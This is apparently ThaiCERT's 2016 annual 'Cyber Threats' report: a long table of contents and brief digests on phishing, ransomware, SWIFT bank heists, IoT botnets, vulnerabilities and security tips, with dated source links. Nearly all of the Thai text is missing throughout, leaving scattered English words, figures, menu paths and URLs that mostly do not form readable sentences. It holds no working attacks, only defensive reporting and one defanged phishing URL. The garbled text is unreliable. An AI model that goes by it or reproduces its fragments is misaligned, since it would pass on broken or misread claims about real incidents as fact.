
CYBER THREATS 3
2016
CYBER THREATS 2016
ThaiCERT
Martijn Van Der Heide

1 2560
3,000
300
.. 2537

()
(Thailand Computer Emergency Response Team: ThaiCERT)

() (.)
Electronic Transactions Development Agency (Public Organization) (ETDA)

Ministry of Digital Economy and Society

()
20 33/4 9

10310
: 0 2123 1212 | : 0 2120 1200
: office@thaicert.or.th
: www.thaicert.or.th
() : www.etda.or.th
: www.mdes.go.th









Thailand 4.0




2559




()

SWIFT
5
SMS










Cyber Threats 2559 fb.com/thaicert twitter.com/thaicert




Statistic
Research
& Education ( )

()

Awareness

Mastercard ................................31

32
..........................34


blockchain....................................................................................35
iPad Pro 9.7
iOS 9.3.2

.........36




.....................................................................................37
SandJacking

iOS
.........................................................38
Social Network
.........................................................40
TeamViewer




442



44
446
TeamViewer
447




..........49

.................................................51
Google

2
OTP.................................53



.....................54


.....................55

Facebook556


Malvertising ..................58
Windows XP............................59
1234660


...........................................................................................61
Tinder

............................................62

Pokemon GO663
Firefox


Windows.............................66

social engineering667

iPhone


6 68


69
CloudFlare
WordPress


....................................................70
ATM skimming ...................................................71

SDK

...................................................................................72



...........................................................73



......................................................................................74
Microsoft EMET

2561
Windows 10..............................................75

SHA-1
2560 35% . ..................................................................................76


...............................................77

Star Wars - Rogue One..................................................................................78


880

Fraud

Netflix ....................................................83
Apple
SMS Apple ID.....................84
iOS 9.3..................................85



..............86
Facebook Facebook.........................................87

LINE 500 Free Coin
....88
ISP Game of Thrones.............89
FBI

...........................................................................90
PayPal
PayPal.................................................................................................91

..........................................................................................92
GoDaddy

..............................................93
DSI VoIP . ............94


WhatsApp Facebook.........................................................96


1,500 .....................................................................................................97




...................................................................98
iPhone


Apple ID .............................................................99
Incident


.................................................................... 101
MedStar Health ...................................... 102
FBI

53............... 103
Panama Papers


............ 104

............................................................................................................ 105


...................................................................................................... 106


. .................................................... 107
ISIS
.................................................... 108
Qantas Wi-Fi


......................................................................................................... 109
FBI

......................... 110
Microsoft Platinum

................................................................................................. 111

SWIFT ........... 112

GhostShell 32
FTP.............................................................................................. 113



................................................................................................. 114

SWIFT 12 ................................................... 115
Twitter 2,500
/...................................... 116


..................................................... 117

SWIFT

Sony Pictures.............................................................................. 119
TeamViewer



......................................................................................... 120


...................................................... 121
Twitter Pinterest
LinkedIn .................................................................... 122
Toyota Lexus

1 123

7 ................. 124



Twitter
2
............................................ 125
GoToMyPC



............................................................................. 126

Twitter Twitter
Mark Zuckerberg............................................... 127
SWIFT
10 ...................................................................................... 128
Lizard Squad
DDoS
.................................................................................. 129
iOS
iCloud
........................................................................... 130
Marriott Hyatt

.................................................. 131
Steam
9.1 .............................................................. 132
Epic Games 8 .................................. 133
Fitness Tracker McDonalds

........................................................................ 134
FBI




....................................................................... 135
macOS 10.12 (Sierra)


Razor kernel panic..................................................................................... 136
OVH DDoS 1.1 Tbps
IoT................................................................................................ 137
1.5
botnet
DDoS1 138

............................................................................... 140
GlobalSign


..................................................................... 141

.................................................................................................. 142
Tesco Bank
20,000 ....................................................... 143
DDoS
IoT.................................................................................... 144

Lenovo Windows Server 2559 November


.................................................................................................................. 145
ATM ......................................... 146
ISP
DDoS
1
Mirai....................................................... 147




.................................................. 149



HIV ................................. 150
Skype
................................................................................................................. 151
1
......................................................................................................... 153
Leet DDoS 650 Gbps.................................. 154


................................................................................................... 155

Law & Policy

Anonymous

#OpSafePharma1 157
Open source

............................................................................................... 158
NIST

1 159

SpyEye 24 1 160



1 161




1 162




.............. 163


LulzSec
.................................................................................... 164




................................................................... 165

......................................................................................... 166


........................................................................................ 167


....................................................................................................... 168
50
45 ......................................................... 169


..................................................................... 170

.......................................................................................................... 171



...................................................................................... 172

Kickass Torrent
Apple, Facebook Coinbase................................................................................ 173

DDoS


2557.......................................................... 174

.................. 175

.................................................................................................................... 176
Verizon 5
1 177
Mozilla
WoSign
StartCom Apple .................................................................. 178
FBI


Lizard Squad PoodleCorp............ 179
IoT
CSA

1 180
Apple Watch


............................................................. 181

G7
1 182

IoT

......................... 183
FCC ISP
1 185

2559-2564.................................................... 187
NIST Homeland Security


IoT1 188


................................................................... 189
NIST



.................................. 190


1 2560.................................................................... 191

Malware

Emsisoft Lab




HydraCrypt UmbreCrypt............................................................................................ 193
Linux Mint Backdoor ISO........................ 194
CTB-Locker

................. 195
Porn clicker Google Play.............................................................. 196
KeRanger
Mac.................... 197
TeslaCrypt
4.0

..................................... 198
Android Flash Player

Google............................................................ 199
Petya MFT


................ 200



............................... 201
Android.Lockdroid Android

................................................................................................. 202
Google Play Store 100 ............ 203
OSX.Pirrit Mac OS X ..................................... 204
CryptoHost .rar .............. 205
! Amazon........................................... 206
Jigsaw




................................................................. 207
ATM

...................................................................... 208
SamSam JBoss

.................................................................. 209
CryptXXX
Bitcoin............................................................................................... 210
TeslaCrypt



............................................................................................................. 211
Android root

........................................................................................ 212
! Play Store


.............................................. 213
Pirate Bay
........................ 214
CryptXXX ..................................................................... 215
7ev3n-HONE$T



................................ 216

Internet of Things (IoT)


.......................................................................... 217
Alpha ........................................................................ 218
FBI

................................................................ 219
Android


SMS................................................................................. 220
Google Play Store
.............................................................................. 221


Dridex
Cerber.......................................................... 222
.............................................. 223
CryptXXX 2.0 ...................................................... 224


TeslaCrypt


2 225
! WhatsApp Gold
............................... 226
ZCryptor
.zcrypt..................................................................................................... 227

Asus LiveUpdate

2 228
Android
URL
.......................................................................................... 230
FLocker
Android...................................... 231
iOS App Store
SDK 2 232

TeamViewer



.................................................................. 233
True Lenovo P1m
................................ 234
JavaScript
.................................................................................... 235
Godless Play Store
root
..................................................................... 236

OTP............................ 237

Facebook

....................................................................... 238


Office 365.............................. 239
LevelDropper Play Store
root
........................................................................... 240

................................................................................... 241
Hummer Android
35,000 root
.......................... 242
Mac
........................................................................................................ 243
Keydnap Mac ..................... 244


Pokemon GO ......... 245
Ranscam
........... 246
Europol

......................................................................... 247
Microsoft ..WSF (
. 2 )............. 248

SpyNote Android
........................................................................................................ 249
FossHub Audacity Classic Shell............ 250
Google Play Store 155


2.8 ..................................................................................... 251
Shortcut........................................... 252
Cerber




..................... 254
Svpeng Android Google AdSense
................................................................................................... 255


........................................................ 256
Rex
Linux
Bitcoin DDoS............................................................................................................. 257
Wildfire
..................... 258
Pegasus iOS

iOS 9.3.5 !.............................................................................................. 259
Locky
DLL............................. 260
Transmission ()
Keydnap Mac OS X................................................................................. 261
DressCode Google Play Store

Botnet............................................................................................ 262
Cerber
............................... 263
Gugi


Android 6....................................................................... 264


NAS Seagate................................................................................... 266
iOS 75


App Store............................................................. 267
.hta .......................... 268
Guide for Pokemon GO Play Store
root
......................................................................... 269
Komplex Mac OS X
..................................................................... 270
Xiny Android Play Store
root ............................................. 272
MarsJoke



96 ......................................................... 273

Xpan
remote desktop................................................................................................... 274
Mirai IoT

DDoS ....................................................................... 275


Cerber


4 ....................................................... 276
Symantec Odinaff


macro.................................................... 277
NyaDrop

IoT Linux.............................................. 278
Mirai
Sierra Wireless
.......... 279
Microsoft Locky .LNK.............. 280


Google AdWords
macOS
............................................................... 281
Svpeng
Google Chrome Android
.apk . ................................................................... 282

Mirai

(DVR) ............................. 283

Facebook
....................................................................................................... 284

Keygen

........................................................................................... 285
Gooligan Android

Google Account............................................... 286


Android



2 287
Super Mario Run Android
................................................................................... 288
Privacy

FBI Apple iOS



................... 291
Home Depot 19.5

.................... 292

QQ Browser

................................................................................ 293
CNBC

.............................................................. 294
50 .................................................................................. 295
.


........................................ 296

2 297

VPN Opera
Proxy......................................... 298


....................................................................................................... 299
1.5 GB
SQL injection................................................................................................... 300
Facebook 2558



13%................................................................. 301
Telegram
SMS OTP ............................................................ 302
NHS 1.6
Google
AI........................................................................................................... 303
Google, Yahoo, Microsoft 272

.............................................................. 304
Twitter ................................................................ 305
Runkeeper



3 306
! LinkedIn



2555 ............................................................................ 307
LinkedIn

123456...................... 308

Anonymous
33 .................................. 309
Facebook ..................................................................... 310
Tumblr ...................... 311


............................................................................. 312

TeamGhostShell
MongoDB 36 ......................................... 313
Facebook Netflix


.............................................................. 314

Flash Keyboard
Play Store 3 315
GitHub
2FA3 317
Mark Zuckerberg

.......................................................................... 318
LogMeIn

............................................................... 319
154

....................................................................................................... 320
Google

...................................................................................................... 321

22


3 322

Maxthon Browser
.............. 323
EFF


................................................... 324
Dota 2 2
.................. 325
Minecraft World Map 71,000 .......... 326
Dropbox 60 ..................................... 327
Seagate

3 328
Yahoo 500
....................... 329
Dropbox 60

................................................................................... 330

Dailymotion 85 .................................. 331

Research & Education





......................... 333


........................................................... 334

KeySniffer
.................................. 335


/............................................................. 336






3 337



white-hat hacker
100 ......... 338
3 339
F-Secure Helsinki

.................... 340

iPhone 5c

...................................................................................................... 341
Europol
25593 342
(NCSC)

700 ............................................................................................................. 344


........................................................................ 345


Smart Nation3 346
Singtel


cybersecurity.......................................................................................... 348


CPU
machine learning................................................................................................... 349



Philips Hue....................................................................................... 350
IBM
................................................................ 351




..................................... 352

354
2 ................................................................................................ 353
NIST NSRL




......................................................................... 354

Statistics


2558

Star Wars

..................... 357
FBI 2.3
2
........................................................................................... 358
Apple iOS 80
Touch ID 89%..................................................................................................... 359
Kaspersky DDoS 2559......................... 360
PandaLabs 2559



227,000 ................................................................................ 361
........................................................................ 362
Windows 1 4 Internet Explorer
Flash Java........................................................................................................ 363
Ransomware
90,000
.......................................................................................... 364
Ransomware 2559
10
2558........................................................................ 365
4
........................................................................................ 366
58 59
2.3 ......................................................... 367



3 368

10
6 369


3 370
DDoS 2559

124,000 579 Gbps....................................................... 371


88% ..................... 372
Kaspersky DDoS 2559
Linux Botnet....................................................................... 373

...................................................................................................................... 374

21
....................................................................................... 375

2559


200%......................................................................... 376
1 5

...................................................................................................... 377


........................................................................................................... 378
40% Word3 379
Sucuri


2559
WordPress
Joomla!....................................................... 380

DDoS 1
................................................................................................... 381
1 10
.............................................................................................. 382
Android
1
Play Store..................................................................................... 383
89%
Wi-Fi
.......................................................................... 384

NTT Security

3 2559


............................................................................. 385
15%
20% Telnet
....................................................... 386


................................... 387

77%
95% .................................................................................................... 388
Akamai 3 2559
IoT

........................................................................ 389
66%


................................................................. 390
Flash Player, Internet Explorer Windows

.................................................................................................................. 391
UK 90% Windows XP


2 .............................................................................................. 392
1 5



. .................. 393

Vulnerability & Patch

Google 2559


Nexus............................................................. 395
VMware privilege escalation
Shared Folder........................................................................................................ 396
OpenSSH Private Key

.................................................................................................................. 397
Debian
...................................................... 398
Microsoft, Adobe, Google, Mozilla Apple
.. 593 399
Truecaller
Android 100
.................................................................. 400
iOS 9 - 9.3.1

Passcode ................................................................................................ 401
Cisco
....................................... 402
Adobe Flash Player 21.0.0.213


................. 403
Samsung Galaxy


. SMS . ..................................... 404
QuickTime Windows


Apple .................................................. 405
Cisco
....................................... 406
HP Data Protector

.................................................... 407
Firefox 46
................................................ 408
Chrome


.................................. 409


ImageMagick
........................................................................ 410
Apple Xcode 7.3.1 Git


.............................................................................. 411

OpenSSL

......................................................... 412


Cisco Cisco TelePresence................................ 413
HTTPS


............. 414
WordPress 4.5.2
........................................ 415
Microsoft Adobe

.................................................................................................... 416
Adobe Flash Player 21.0.0.242 ............. 417
WordPress
Jetpack
XSS ...................... 418



.............................................................................................. 419

Samsung KNOX Samsung Galaxy


............................................................................................................... 420
KeePass 2 HTTP

............................................................................... 421

Lenovo Lenovo Accelerator Application

.................................................................................... 422
Mitsubishi Outlander
................ 423
KeePass HTTPS
............................................................................................................ 424
D-Link

................................... 425
! Samsung Software Updater

..... 426
Adobe Flash Player !

(CVE-2016-4171)................................................. 427
Symantec
Norton


..................................................... 428
Foxit Reader 8.0




............................................................ 429
LibreOffice

RTF............................................................................ 430
Wget
1.18
redirect
........................................................................... 431
ThinkPwn BIOS

Lenovo, HP Gigabyte........................................................ 432


Microsoft

(CVE-2016-3238)...................................................................... 433
iOS Mac OS X


MMS, , ................................................. 434
Internet Explorer Edge Microsoft Account

.................................................................................................................. 435
Quadrooter Qualcomm Snapdragon
Android root
........................................................................... 436
!
Cisco

Equation Group.............................................................. 437
Apple OS X

........... 438
Cisco WebEx Meetings Server ....... 439



Drupal .............................................................................. 440
Cisco 850,000

0-day

BENIGNCERTAIN....................................................................... 441
Samsung Knox


................................................................ 442



....................................................................................................... 443

Avtech
130,000 .................................................. 444
Pork Explosion Android



....................................... 446
Akamai SSHowDowN OpenSSH
IoT
DDoS......................................................................................... 447
Nine Android
........................................................................................... 448


Netis, D-Link,
Asus 3 ............................................................................................................. 449
Dirty COW Linux (CVE-2016-5195)
root ................................................................................................ 450
Joomla! 3.6.4

.................................................................. 451
Adobe Flash Player

............................................................................................. 452
Joomla! 3.6.4
25,000
........................................................................................ 453
MySQL, MariaDB PerconaDB


(CVE-2016-6663, CVE-2016-6664).... 454
D-Link DIR


remote administration.......................... 455
MacBook Pro 2016 Touchbar SIP ()

Apple ............................................................................................ 456



Netis 15,000


2
..................................................... 457
0-day Firefox

Tor Browser ....................................... 458




4 459
Sony 80

.................................................................................................... 460
Netgear
......................................................................................... 461
! Joomla! 3.6.4
admin ............................................................................................................. 462
Netgear R6250, R6400, R7000 R8000


......................................................................................................................... 463
Netgear ZyXEL
.................................................................................................... 464


........................................................................................................................... 466

Awareness

Mastercard





()

92%










: 25/02/2558
: BBC <http://thcert.co/TNJPbn>



(http://www.manager.co.th/Home/ViewNews.aspx?NewsID=9590000026501)
IT data center

data center
manager

3.
FM-200, Novec 1230
3


1.
CO2
data center
data center 2



2.


3.

1.


4.

2.






: 2/25/2559
:
( Infrastructure Network )
<http://thcert.co/mx65S0>




HackerOne 150,000
Hack the Pentagon 18
12 2559


: 4/4/2559
: U.S. Department of Defense
<http://thcert.co/4TCbKj>


blockchain
Defense Advanced
Research Projects Agency (DARPA)

blockchain





: 4/26/2559
: ZDNet <http://thcert.co/HEIWJY>

iPad Pro 9.7 iOS 9.3.2



16 2559 Apple Apple
iOS 9.3.2
iPad Pro 9.7
Apple support
iPad Pro 9.7
iOS 9.3.2

: Apple
: 19/05/2559
: Phone Arena <http://thcert.co/Y9Go0f>

ICPA
Industrial Cybersecurity
Promotion Agency (ICPA)




2560
2563

: 23/05/2559
: Softpedia <http://thcert.co/1WTXlu>

SandJacking
iOS
iOS ()

Android iOS
iOS App Store



GPS
iOS

(

https://www.thaicert.or.th/papers/technical/2014/pa2014te003.html) Su-A-Cyder

Black Hat Asia

iOS


Apple
Xcode 7
iOS 8.3 Apple
Apple ID

Apple
iOS
SandJacking
Backup
Restore SandJacking
Backup iOS Apple

iOS
Backup Restore

Restore
Backup
: 28/05/2559
: Security Week <http://thcert.co/HsHn0M>

Social Network




4.


5.


6.


7. Do Not
Track

ETDA
8.

1.


9.
2.




10.
3. URL




: 28/05/2559
: ETDA <http://thcert.co/QwA48k>

TeamViewer


TeamViewer
Remote Desktop

1
2559 ()
TeamViewer
2 (2-Factor
TeamViewer Authentication)


The
Register
TeamViewer
2





TeamViewer
DNS



3. TeamViewer
TeamViewer
1. 4.
VNC

2. 2
(http://www.teamviewer.com/en/help/402-How-do-I-activate-deactivate-two-factor-authentication-for-my-TeamViewer-account.aspx)
: 02/06/2559
: Inquisitr <http://thcert.co/P35ukG>,
Reddit <http://thcert.co/YVTgBF>,
TeamViewer <http://thcert.co/5jDUro>






2.




3.



4.
Tripwire



5.
1.

HTTPS

SD Card 2 (2 Step Authentication)

6. Wi-Fi 9.

VPN
7. 9



8.

: 06/06/2559
: Tripwire <http://thcert.co/r0NsQA>


1.
appIe.com I ()
l ()
Infosec Institute
2.

googlr.com
-
3.

ebay-payment.com

- Redirect


URL






URL
-
3
: 07/06/2559
: Infosec Institute <http://thcert.co/JmjklZ>
TeamViewer

TeamViewer

1.
TeamViewer 2 (2 Factor Authentication)
2 www.teamviewer.com Edit Profile
Trusted Devices
Two factor authentication
Activate
2

2 Google Authenticator
TeamViewer 2.
(
2 Blacklist (
TeamViewer ) ) Whitelist
Data Integrity (
)
TeamViewer
Extras > Options Security
Configure Black and Whitelist


3. 4. Windows
TeamViewer TeamViewer
4
Whitelist
Extras > Options > Advanced > Show advanced options Always Lock Remote Computer
Extras > Options > Security
Password strength
Disabled

Secure Very secure

: 07/06/2559
: TeamViewer <http://thcert.co/69cNpR>,
Reddit <http://thcert.co/kc6kYW>



Kaspersky
Android
iPhone
Serial
Android (
Android 4.4 5.0)
Android
6.0


iPhone


Pair


Android
AT command (
Black Hat Europe 2014 https://www.blackhat.com/docs/eu-14/materials/eu-14-Pereira-Charge-Your-Device-With-The-Latest-Malware.pdf)
Serial
Firmware







Serial

: 08/06/2559
: Security Affairs <http://thcert.co/ZI22Ni>,
Kaspersky <http://thcert.co/PEzwjF>

DBS OCBC

DBS

2560
OCBC
2559
Voiceprint

(
)

(Fingerprint)
Citibank

66% Citibank



(Authentication) 3 1 2 (
ATM + +
1. (Something you know) SMS OTP)
ATM 3
2. (Something you have)
ATM

3. (Something you are)
: 17/06/2559
: Computer Weekly <http://thcert.co/MkdYPO>

Google
2 OTP
2


OTP (One Time Password) SMS
https://myaccount.google.com Sign-in & Security > 2-Step Verification > Google prompt > ADD PHONE
(
Google 1 )
2
Android iOS
iOS
OTP Google app

2
Google
(https://www.thaicert.or.th/papers/general/2015/pa2015ge001.html)

: 23/06/2559
: Mashable <http://thcert.co/pSuZWz>



Security Affairs

2558 Jeremy
Cook 18 Remote Wipe











: 24/06/2559
: Security Affairs <http://thcert.co/Z3a5oI>







https://odette.carto.com/viz/c5cf5b84-fdb9-11e5-bbd7-0e3a376473ab/embed_map

Protection1
6,000

http://www.insecam.org/en/bycountry/TH/


Los Angeles, San Francisco
New York

: 24/06/2559
: Protection1 <http://thcert.co/Bqg5iu>


Facebook
Naked Security (Privacy) >
(Who can see my stuff?) >
Facebook
(Who can see your future posts) (Friends)
1.


Facebook

(Public) (Setting) >
Facebook (Privacy) >
(Who can see my stuff?) >

(Limit the audience for posts you've shared with friends of friends or Public)
(Limit Old posts)
Facebook


Profile
... > (View As..)

(Setting) >

Profile
Facebook

2. Facebook 2
Facebook
Facebook

Facebook
SMS

2
Facebook (Setting) >
(Security) >
(Login Approvals)
Facebook


(Setting) >

(Privacy) >
(Who can look me up?) (Setting) > (Security)
> (Login Alerts)
3.
2

: 27/06/2559
: Naked Security <http://thcert.co/2xuOWh>

Malvertising







MSN, BBC
Malvertising (Malware + Advertising)
Malwarebytes 70%
Malvertising








Malwarebytes
Adobe Flash Player,
Adobe PDF Reader, Java



: 27/06/2559
: Malwarebytes <http://thcert.co/iZ49JU>

Windows XP
TrapX
( Windows XP
MEDJACK
medical device hijack Windows )




Backdoor


Botnet
TrapX





Windows XP
: 29/06/2559
: The Register <http://thcert.co/KSigvM>,
TrapX <http://thcert.co/2lj8X3>


1234
Smart home security system




SMS









1234 admin1234





: 30/06/2559
: heise online <http://thcert.co/lJ1s3x>





3.

(Whitelist)




4. Log


Log
1.


XP

Firewall
(https://www.thaicert.or.th/papers/general/2014/pa2014ge001.html)
2.

: 29/06/2559
: The Register <http://thcert.co/KSigvM>,
TrapX <http://thcert.co/2lj8X3>

Tinder

Symantec
Tinder
















118.76

: 22/07/2559
: Help Net Security <http://thcert.co/k5rvDP>,
Symantec <http://thcert.co/Skd5lM>

Pokemon GO
Pokemon GO -
Android iOS

2559

6 2559

-



GPS




-
()
Pokemon GO


(http://gizmodo.com/armed-robbers-used-pokemon-go-to-find-9-victims-1783416898)


-





-
(http://www.straitstimes.com/world/united-states/pokemon-goes-to-court-in-backyard-monster-trespassing-case)

-

(https://www.theguardian.com/technology/2559/aug/01/pokemon-go-banned-sex-offenders-new-york)



(http://www.standard.co.uk/news/world/pok-mon-go-japanese-officials-plead-with-people-to-stop-playing-game-in-hiroshima-memorial-park-a3306701.html)
-
(http://www.androidcentral.com/researchers-find-remote-access-tool-side-loading-pokemon-go-apk)
-
- Google



-
Google
(http://www.ktnv.com/news/contact-13/new-scam-targets-pokemon-go-players)

: 08/08/2559
: ThaiCERT <http://thcert.co/RYqBRy>

Firefox
Windows
Mozilla Firefox Firefox
(digital Firefox
certificate) 49
Firefox
Windows Windows
access:config
address bar Firefox
( root certificate)
Firefox
settings security.enterprise_roots.enabled

Firefox 49
13 2559
: 05/09/2559
: Softpedia <http://thcert.co/M1xgsd>

social engineering
Social engineering


3.

social engineering (phishing)


1.







2.



: 07/09/2559
: Brightmove <http://thcert.co/lQKWw1>


iPhone
- Find my iPhone
Apple iPhone
iPhone iPhone
activate (https://support.apple.com/kb/PH2702?locale=th_TH&viewlocale=th_TH)
iPhone -
iOS
iMessage
(https://support.apple.com/th-th/HT203042)
- iPhone Apple Watch Apple Watch (https://support.apple.com/th-th/HT204568)
-
-
(Erase All Content and Settings) (https://support.apple.com/th-th/HT201274)
SMS
iTunes
iCloud (https://support.apple.com/th-th/HT203977)
https://icloud.com/find
: 09/09/2559
: Apple <http://thcert.co/bBvYIV>,
Graham Cluley <http://thcert.co/z02G3Y>

1.

(Security Question)
(
)


2.

(
)








: 19/09/2559
: Kaspersky <http://thcert.co/slrzJW>

CloudFlare
WordPress

CloudFlare


WordPress
CloudFlare

web application firewall (WAF), cache, SSL,

CloudFlare

WordPress (https://wordpress.org/plugins/cloudflare/)

: 23/09/2559
: Softpedia <http://thcert.co/pexLau>

ATM skimming

ATM skimming 2559
Kaspersky

skimmer
ATM

( 12
ATM skimmer
https://www.thaicert.or.th/papers/general/2013/pa2013ge009.html)
GSM
EMV Chip-and-PIN






(biometrics)

: 03/10/2559
: The Merkle <http://thcert.co/zn6G4I>,
The Register <http://thcert.co/EEzi6p>

SDK

Palo Alto Networks Android 2.8


Virus Bulletin International Conference


(abandonware)








SDK (software development kits)

SDK


SDK


: 10/10/2559
: Search Security <http://thcert.co/aioGCx>


(IAEA - International Atomic Energy Agency)

3-4
2557
(
)






: 12/10/2559
: ZDNet <http://thcert.co/eifhLU>




Facebook

( )




: 14/10/2559
: ThaiCERT <http://thcert.co/tGWVLM>

Microsoft
EMET 2561
Windows 10
EMET
Microsoft EMET
Windows 10
Windows
EMET
(
EMET https://www.thaicert.or.th/papers/technical/2013/pa2013te005.html) Windows 10 ()

3 2559
Microsoft
EMET
2561

Windows 10
: 07/11/2559
: ZDNet <http://thcert.co/7OI7Ox>


SHA-1 2560
35%
(digital certificate)
SHA-1 HTTPS


Let's Encrypt
(https://letsencrypt.org/)
HTTPS
2560 SHA-1
SHA-2
SHA-1 HTTPS 2560

HTTP

Venafi 35%
SHA-1
2560

: 18/11/2559
: Information Security Magazine <http://thcert.co/9jk1rl>,
Venafi <http://thcert.co/hnDZMS>

2559 Mobile Connect


OpenID Connect
3 M1,
StarHub Singtel OAuth 2.0
Mobile Connect

Mobile Connect
GSMA
(http://www.gsma.com/personaldata/mobile-connect)
API

2560
: 01/12/2559
: ZDNet <http://thcert.co/ejlIzM>


Star Wars - Rogue One
:


Rogue One: A Star Wars
Story Star -
Wars 3 4

Death Star
-



- - (data center)




-

(data leak prevention)


-




- -
1


: 22/12/2559
: Slate <http://thcert.co/U0scCe>,
Threat stack <http://thcert.co/w7DqwT>,
Preservica <http://thcert.co/E8jYc3>






(

)




Wi-Fi





: 26/12/2559
: 9News <http://thcert.co/eT5Hk3>

Fraud

Netflix

Symantec
Netflix
(Phishing site)





Netflix
Netflix

URL



Netflix Symantec
Infostealer.Banload

: 15/02/2559
: Softpedia <http://thcert.co/CeGKlX>

Apple SMS
Apple ID

SMS AppleInc (Phishing)
SMS Apple ID

SMS
Apple URL

2

Apple ID

Apple ID

: 12/04/2559
: Graham Cluley <http://thcert.co/4SyShc>


iOS 9.3

iOS
iOS 9.3
taig9.com
taig.com
TaiG

iOS iOS
en-pangu.com
Pangu en.pangu.io

: 19/04/2559
: Mobipicker <http://thcert.co/3ZfLMX>



Financial Fraud Action UK
2558

72%
168.8














: 20/04/2559
: Help Net Security <http://thcert.co/tqvxfm>

Facebook
Facebook
Netcraft
Facebook

Facebook
HTTPS facebook.com
Login Alert
Login Approval

2

: 28/04/2559
: Netcraft <http://thcert.co/GM0qcC>

LINE 500 Free


Coin
LINE
LINE 500
Free Coin


LINE
LINE





: 15/06/2559
: <http://thcert.co/0gdoLd>

ISP
Game of Thrones
TorrentFreak HBO



HBO
Game of Thrones
ISP
Game of Thrones


72





: 08/07/2559
: News <http://thcert.co/ERcek0>,
TorrentFreak <http://thcert.co/yoT4qj>

FBI

FBI 2.3
International Conference on Cyber Security
FBI
CEO




CEO

FBI
2556 2559
2
17,642
: 01/08/2559
: CNN <http://thcert.co/wnHfi9>


PayPal PayPal
Proofpoint
Proofpoint
PayPal
PayPal Proofpoint
You've got a money request
members@paypal.com
PayPal
PayPal

(
100 URL)
PayPal

URL
Google (goo.gl)

Zeus


: 03/08/2559
: Hackread <http://thcert.co/KTP2sE>,
Proofpoint <http://thcert.co/onyBrS>



9 2559

(.
.)

Twitter















: 10/08/2559
: <http://thcert.co/gXBNxO>,
<http://thcert.co/AFg96J>

GoDaddy

DEFEND Magazine
(hxxp://mtparent.com/themes/www.html)
GoDaddy

GoDaddy

GoDaddy
support@godaddy.com





20 GB 24 URL

: 29/08/2559
: DEFEND Magazine <http://thcert.co/1hbGOX>

DSI VoIP
.
(DSI)
0 2831 9888
DSI

.
DSI

() ATM


DSI
DSI

DSI .
0 2831 9888
DSI
DSI .
.


. DSI
VoIP
DSI .

. 0 2831 9888

DSI


DSI

DSI
ATM
: 30/08/2559
: (DSI) <http://thcert.co/4owTG7>

WhatsApp
Facebook
2559 1.
WhatsApp
Facebook
2556
WhatsApp
Facebook

Facebook 2.
30

Setting () >
Account ()
Share my account info
()

WhatsApp
Facebook WhatsApp
2 Facebook


: 30/08/2559
: NakedSecurity <http://thcert.co/tKrRhS>,
WhatsApp <http://thcert.co/GcWDuR>


1,500
Leoni AG


2559

2559 FBI
1,500
1




( )

: 02/09/2559
: Softpedia <http://thcert.co/GJvLmh>,
Leoni <http://thcert.co/Y6Pqxx>

Trustwave


(Point-of-Sale)



Trustwave

3 social engineering
Carbanak

1 2556-2557





: 15/11/2559
: Computer World <http://thcert.co/fSZdEe>,
Trustwave <http://thcert.co/ScV7fq>

iPhone

Apple ID

Pantip SMS
iPhone Apple ID
iCloud Apple
(Lost mode) Find My iPhone
Apple ID

(Factory reset)
OTP
Apple ID


(Phishing) SMS Find My
iPhone
Apple
iOS
Apple ID Apple ID
Apple
ID


2
: 28/12/2559
: Pantip <http://thcert.co/m5HJtk>

Incident


7
7
2554-2556
DDoS




7

: 28/03/2559
: We Live Security <http://thcert.co/xlQkSe>


MedStar Health
28 2559 MedStar Health Inc.
MedStar
Health Inc.
(Ransomware)
17,000


FBI







: 30/03/2559
: Inquisitr <http://thcert.co/RQv7FK>

FBI
53
FBI

(Office of Personnel Management)
2553 FBI
(https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/)
1

: 07/04/2559
: Motherboard <http://thcert.co/XaJ9CA>

Panama Papers


Mossack Fonseca

Wired

Drupal

2555
(SSL v2)

Wikileaks

: 07/04/2559
: Naked Security <http://thcert.co/O4xDhj>,
Wired <http://thcert.co/IJHCSi>


(Department of Homeland Security)
2558

(Energy Sector) 103
6

Call Center
17 2557

: 07/04/2559
: DHS <http://thcert.co/SSEqsM>,
CNN <http://thcert.co/HMO75G>,
The Register <http://thcert.co/TIAMi2>




Check Point


Taobao
ebay
Qihoo 360
Whitelist

Google Play,
App Store


: 12/04/2559
: Check Point <http://thcert.co/HRmcAn>

2558
Eddie Tipton
()

14.3


6 DLL

Eddie
Tipton DLL DLL

DLL

: 22/04/2559
: Security Affairs <http://thcert.co/bTx0Kh>

ISIS
ISIS
ISIS
Cyber Caliphate Army (CCA) Junaid
ISIS Hussain
Sons Caliphate Army (SCA) 2558,
Kalacnikov.TN (KTN) 2559
United 2559
Cyber Caliphate UCC
ISIS


(Web Defacement)


50,000 ,


3,602
: 28/04/2559
: Softpedia <http://thcert.co/1hviX9>,
The New York Times <http://thcert.co/v2eZBC>

Qantas
Wi-Fi

Qantas
40
2
Wi-Fi hotspot Mobile Detonation Device



Wi-Fi

: 02/05/2559
: Mashable <http://thcert.co/XFyaav>

FBI

FBI

SWIFT
81

SWIFT

FBI
1

: 11/05/2559
: CIO <http://thcert.co/ohW5Lv>,
PC World <http://thcert.co/V45jHG>

Microsoft Platinum

Microsoft




51.4%
(2.9%)



,







Spear-Phishing

: 12/05/2559
: Microsoft <http://thcert.co/R85cAK>

2
SWIFT

2

81
SWIFT
SWIFT 2
PDF

SWIFT
2




SWIFT




2

: 13/05/2559
: Reuters <http://thcert.co/kd0H7b>

GhostShell
32
FTP
15 2559 NASA,
GhostShell Pentagon, Federal Reserve FBI
32 1.6
( 2558
) Pastebin
, 500
1,181
82


FTP

FTP

( FTPS), ,
2556 Ghostshell ,

120,000


: 18/05/2559
: Security Affairs <http://thcert.co/Uk6tjJ>




FDA 2559
Merge Hemo



5










(Whitelist)
: 18/05/2559
: Ars Technica <http://thcert.co/DVoJZr>

SWIFT
12

3 SWIFT

SWIFT
2559


2 SWIFT


3
Banco del Austro (BDA)

2559

: 23/05/2559
: The Hacker News <http://thcert.co/YaLoe6>

Twitter 2,500
/

Symantec
Twitter 2,500



Twitter



2554
2



: 25/05/2559
: SC Magazine <http://thcert.co/uyJAkX>

RUAG
30,000


2557
2559


RUAG





-

( Blacklist Whitelist)
Active Directory
-
User

-

RUAG -


Log
- Web Proxy - Log
Log 2
Log DNS
- Log
- (Centralize Log)

- Log

Active Directory

- RUAG https://www.melani.admin.ch/dam/melani/en/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf
-
2 (2 Factor-authentication)

-
(Audit)

: 25/05/2559
: The Register <http://thcert.co/I4VW5f>,
